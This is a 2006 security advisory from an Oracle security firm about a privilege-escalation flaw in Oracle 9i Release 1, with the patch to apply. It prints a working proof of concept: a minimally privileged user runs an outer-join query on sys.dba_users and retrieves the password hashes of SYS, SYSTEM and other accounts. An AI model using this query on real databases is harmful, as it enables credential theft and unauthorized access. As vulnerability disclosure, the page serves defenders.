Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Escalate Privileges via View with Outer Joins in Oracle 9i Rel. 1
Details A potential security vulnerability has been discovered in Oracle9i database server. It is possible to create a user defined in the Oracle9i database server with limited privileges who can potentially access privileged data using SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server. Example SQL> connect / as sysdba Connected. SQL> CREATE USER rds IDENTIFIED BY rds; User created. SQL> Grant Create Session to rds; Grant succeeded. SQL> connect rds/rds; Connected. SQL> select a.username, a.password 2 from sys.dba_users a left outer join sys.dba_users b on 3 b.username = a.username 4 ; USERNAME PASSWORD ------------------------------ ------------------------------ SYS D4C5016086B2DC6A SYSTEM D4DF7931AB130E37 DBSNMP E066D214D5421CCC AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD SCOTT F894844C34402B67 RDS B2ABF50FCECAE7CB OUTLN 4A3BA55E08595C81 ORDSYS 7EFA02EC7EA6B86F OLAPSVR AF52CFD036E8F425 OLAPSYS 3FB8EF9DB538647C ORDPLUGINS 88A2B2C183431F00 MDSYS 72979A94BAD2AF80 CTXSYS 71E687F036AD56E5 WKSYS 69ED49EE1851900D OLAPDBA 1AF71599EDACFB00 QS_CBADM 7C632AFB71F8D305 QS_ADM 991CDDAD5C5C32CA QS 8B09C6075BDF2DC4 QS_WS 24ACF617DD7D8F2F HR 6399F3B38EDF3288 OE 9C30855E7E0CB02D PM 72E382A52E89575A SH 9793B3777CD3BD1A QS_ES E6A6FA4BB042E3C2 QS_OS FF09F3EB14AE5C26 RMAN E7B5D92911C831E1 QS_CB CF9CFACF5AE24964 QS_CS 91A00922D8C0F146 30 rows selected. SQL> Patch Information Apply Oracle Patchset 9.1.0.2 or later © 2006 by Red-Database-Security GmbH - last update 10-apr-2006 |
Definition Exploit |